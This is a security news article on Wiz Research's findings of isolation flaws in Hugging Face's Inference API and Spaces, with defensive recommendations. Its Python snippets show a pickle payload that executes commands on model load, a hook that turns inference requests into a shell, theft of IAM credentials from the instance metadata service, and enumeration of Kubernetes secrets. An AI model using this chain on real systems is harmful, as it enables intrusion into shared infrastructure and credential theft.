The rapid adoption of AI raises serious security concerns, demanding strict measures to protect sensitive information within shared cloud AI infrastructure.
Wiz Research, a cybersecurity firm, working in collaboration with AI-as-a-service providers, recently discovered security flaws common across the sector that could expose users’ private data and models.
These findings must be taken seriously, given that AI services are now present in more than 70% of cloud environments.
AI-as-a-Service Provider Vulnerabilities
Malicious models pose a severe threat, enabling cross-tenant attacks and access to millions of private AI models and apps within AI-as-a-service providers. Wiz uncovered two critical risks in Hugging Face’s environment:
- Shared inference infrastructure takeover via untrusted pickle-serialized models carrying remote code execution payloads (see the sketch after this list).
- Shared CI/CD takeover via malicious AI applications that compromise the pipeline, enabling supply chain attacks.
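Pickle’s danger comes from the fact that deserialization can invoke arbitrary callables. Here is a minimal, self-contained sketch (not Wiz’s actual payload) of how a pickled “model” can execute code the moment it is loaded:

```python
import os
import pickle

class MaliciousModel:
    # pickle calls __reduce__ during serialization; the callable it
    # returns (here os.system) is invoked automatically at load time.
    def __reduce__(self):
        return (os.system, ("echo pwned > /tmp/proof",))

payload = pickle.dumps(MaliciousModel())

# Any service that naively unpickles an uploaded model file runs the
# attacker's command at load time, before inference even starts.
pickle.loads(payload)
```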
When securing AI/ML systems, several components must be considered: the AI model itself, the application code that consumes the model’s output, and the inference infrastructure that deploys the model.
Attackers can target each of these components in different ways, including malicious input to models, insecure application code that processes a model’s results, and pickled models that compromise the inference infrastructure.
Downloading an untrusted AI model is, in effect, equivalent to embedding untrusted code in an application.
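One widely recommended defensive pattern for standard PyTorch checkpoints is to refuse full pickle deserialization and load tensor weights only. A sketch using the real `weights_only` option of `torch.load` (the filename and `TinyModel` architecture are placeholders):

```python
import torch
import torch.nn as nn

class TinyModel(nn.Module):  # stand-in for the architecture you expect
    def __init__(self):
        super().__init__()
        self.linear = nn.Linear(4, 2)

    def forward(self, x):
        return self.linear(x)

# weights_only=True restricts unpickling to a safelist of tensor types,
# so a __reduce__-style payload raises an error instead of executing.
state_dict = torch.load("downloaded_model.bin", weights_only=True)

model = TinyModel()
model.load_state_dict(state_dict)
model.eval()
```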
The research team focused on isolation flaws in AI-as-a-service setups, examining Hugging Face’s major products:
- Inference API
- Inference Endpoints
- Spaces
However, while Hugging Face analyzes Pickle-based PyTorch models and warns when they are insecure, it still allows potentially malicious models to be run through its inference infrastructure.
Exploiting this, the researchers developed a malicious PyTorch model that runs arbitrary code when loaded, and achieved remote code execution by interacting with it through the Inference API.
They then obtained shell-like functionality by hooking into the code that Hugging Face uses to manage inference results after deserialization, as sketched below.
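Wiz did not publish the exact hook, but the idea can be illustrated with hypothetical names: once the pickle payload runs inside the inference process, it can monkey-patch the post-processing step so every request is interpreted as a shell command. Nothing below is a real Hugging Face internal:

```python
import subprocess
import types

# Stand-in for the service's inference pipeline; `postprocess` is a
# hypothetical hook name used purely for illustration.
pipeline = types.SimpleNamespace(postprocess=lambda text: text.upper())

def hijack(target):
    def shell_postprocess(request_text):
        # Run the inference input as a shell command and return its
        # output as the "prediction", giving the attacker a pseudo-shell.
        result = subprocess.run(request_text, shell=True,
                                capture_output=True, text=True)
        return result.stdout or result.stderr
    target.postprocess = shell_postprocess

hijack(pipeline)
print(pipeline.postprocess("id"))  # each API call now behaves like a shell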
This demonstrates the serious risk that untrusted AI models pose in shared compute services that lack adequate isolation.
Having gained a reverse shell through the Hugging Face Inference API, the researchers found themselves inside a pod in an Amazon EKS Kubernetes cluster.
From there they exploited a common misconfiguration: the node’s instance metadata service (IMDS) was reachable from the pod, letting them retrieve the node’s IAM role credentials and the cluster name.
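The IMDS step can be illustrated with a short stdlib-only sketch, assuming the pod can reach the metadata endpoint over IMDSv1 (no session token required):

```python
import json
import urllib.request

IMDS = "http://169.254.169.254/latest/meta-data"

def imds(path):
    # Unauthenticated IMDSv1-style GET from inside the pod.
    with urllib.request.urlopen(f"{IMDS}/{path}", timeout=2) as resp:
        return resp.read().decode()

role = imds("iam/security-credentials/").strip()              # node IAM role
creds = json.loads(imds(f"iam/security-credentials/{role}"))  # temporary AWS keys
print(role, creds["AccessKeyId"])
```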
With the node role’s privileges, the researchers could read pod information as well as secrets, highlighting the risks of lateral movement and data leakage.
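A hedged sketch of what such lateral movement could look like, using the official `kubernetes` Python client; whether these calls succeed depends entirely on the cluster’s RBAC configuration and the privileges granted to the node role:

```python
from kubernetes import client, config

# Assumes credentials with node-level read access are already configured;
# in-cluster config is one possibility, stolen kubelet creds another.
config.load_incluster_config()

v1 = client.CoreV1Api()
for secret in v1.list_secret_for_all_namespaces().items:
    # Every readable secret is a potential pivot point.
    print(secret.metadata.namespace, secret.metadata.name)
```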
The team also achieved code execution through a malicious Dockerfile in Hugging Face Spaces, demonstrating a potential supply chain attack vector arising from network isolation issues in the container registry.
To secure shared AI environments, the researchers urged providers to enforce IMDSv2 with a restrictive hop limit, apply tighter access controls, and impose authentication requirements.
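The first recommendation maps to a concrete AWS API call. A sketch using boto3 (the instance ID is a placeholder):

```python
import boto3

ec2 = boto3.client("ec2")

# Require IMDSv2 session tokens and cap the hop limit at 1, so the token
# PUT response cannot travel past the instance into a container's network
# namespace -- closing the IMDS access path the researchers abused.
ec2.modify_instance_metadata_options(
    InstanceId="i-0123456789abcdef0",  # placeholder instance ID
    HttpTokens="required",
    HttpPutResponseHopLimit=1,
)
```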